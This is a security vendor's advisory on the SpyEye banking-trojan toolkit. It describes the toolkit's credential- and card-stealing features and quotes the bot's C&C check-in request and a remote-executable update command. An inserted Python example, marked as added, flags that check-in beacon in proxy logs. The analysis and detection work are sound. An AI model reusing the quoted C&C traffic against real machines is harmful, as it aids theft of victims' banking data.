SpyEye crimeware toolkit (May 28, 2010)

The SonicWALL UTM Research team has been continuously monitoring newer variants of the SpyEye bot in the wild. In our detailed analysis of the SpyEye crimeware toolkit we found it to be very similar to Zeus in terms of functionality and features.

SpyEye is a web-based crimeware toolkit that was first released in early January 2010 on underground forums. It is written in C++, and the compiled bot was approximately 60KB in the first version. The newer version of SpyEye includes compression options which further reduce the size of the compiled binary to ~40KB. Like Zeus, the main objective of this bot is to steal financial information, including banking credentials and credit card numbers, as well as other sensitive information from the victim machine.

SpyEye contains many interesting features, which are listed below; the most notable is its ability to kill a Zeus bot infection on the victim machine. This feature was not originally present but was added from version 1.0.7 onwards. Like Zeus, this bot functions in ring3 (user mode) and runs hidden from the task manager, file explorer and other user-mode monitoring applications. The screenshot below shows the SpyEye v1.0.7 toolkit in action:

screenshot

SpyEye version 1.0.7 toolkit features:

  • Formgrabber – Supports logging web form data for browsers like IE, Firefox, and Netscape.
  • Credit Card AutoFill module – Automates the process of getting money from stolen credit cards.
  • Steal FTP, POP3 & HTTP basic authorization accounts.
  • Daily e-mail backup.
  • Feature to kill Zeus bot infection.
  • UPX compression & encrypted configuration file.
  • Web-based control panel (PHP & MYSQL based).
  • Ability to detect and clean SpyEye infection.

The build and configuration file generated by the toolkit can be seen here:

screenshot

Screenshot of SpyEye web control panel main page:

screenshot

Screenshot showing the status of various bots and tasks (posted by the author):

screenshot

Network traffic generated by the bot

  • Upon successful infection, the bot sends the following message containing system information from the victim machine to the C&C server:

    GET /gate.php?guid=USERNAME!COMPUTERNAME!24B5EF92&ver=10120&stat=ONLINE&ie=7.0.5730.13&os=5.1.2600&ut=Admin&cpu=19&ccrc=2F9360E0&md5=b97f34389d7e16b2ff9868ae1130b628

  • A sample command received from the C&C server instructing the bot to update itself:

    UPDATE
    PATH=http://(REMOVED)/bin/ups.exe [Detected as GAV: SpyEye.AI (Trojan)]
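The check-in request above has a fixed shape (a request to gate.php carrying a known set of query keys), which makes it straightforward to flag in proxy or web logs. The following is an added example, not code from the original post or from SonicWALL; it assumes a constructed log format of "client method url" per line and uses the placeholder host example.invalid in place of the removed C&C domain.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query keys seen in the SpyEye check-in shown above. A request is flagged only
# when the path ends in /gate.php and every one of these keys is present, which
# keeps ordinary gate.php pages from matching on the file name alone.
SPYEYE_KEYS = {"guid", "ver", "stat", "ie", "os", "ut", "cpu", "ccrc", "md5"}

# Constructed proxy log lines (not real traffic). The first line reuses the
# check-in parameters quoted above; the host is a placeholder.
SAMPLE_LOG = """\
10.0.0.5 GET http://example.invalid/gate.php?guid=USERNAME!COMPUTERNAME!24B5EF92&ver=10120&stat=ONLINE&ie=7.0.5730.13&os=5.1.2600&ut=Admin&cpu=19&ccrc=2F9360E0&md5=b97f34389d7e16b2ff9868ae1130b628
10.0.0.6 GET http://example.invalid/index.php?id=42
10.0.0.7 GET http://example.invalid/gate.php?guid=x&ver=1
"""


def parse_checkin(url):
    """Return the decoded check-in fields, or None if the URL does not
    look like the gate.php beacon described above."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/gate.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if not SPYEYE_KEYS.issubset(qs):
        return None
    fields = {k: qs[k][0] for k in SPYEYE_KEYS}
    # guid is USERNAME!COMPUTERNAME!<hex id>; split it out for the analyst.
    user, host, bot_id = (fields["guid"].split("!", 2) + ["", "", ""])[:3]
    fields.update(user=user, host=host, bot_id=bot_id)
    return fields


def scan_log(text):
    """Return a list of (client_ip, fields) for every line whose URL
    parses as a SpyEye check-in; malformed lines are skipped."""
    hits = []
    for line in text.splitlines():
        try:
            client, _method, url = line.split(" ", 2)
        except ValueError:
            continue
        fields = parse_checkin(url)
        if fields:
            hits.append((client, fields))
    return hits
```

Run scan_log(SAMPLE_LOG) to see only the first line flagged; the third line hits gate.php but lacks most of the beacon keys, so it is not reported.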

The SpyEye toolkit is currently offered on underground forums for $500, with extra charges for newer features. The toolkit is continuously being updated with more sophisticated features and is a potential contender to surpass Zeus and become the leading crimeware toolkit in the future.

SonicWALL Gateway AntiVirus provides protection against SpyEye bot via GAV: SpyeEye.KD (Trojan), GAV: SpyEyes.DG_2 (Trojan) and GAV: Suspicious#spyeye (Trojan) signatures.
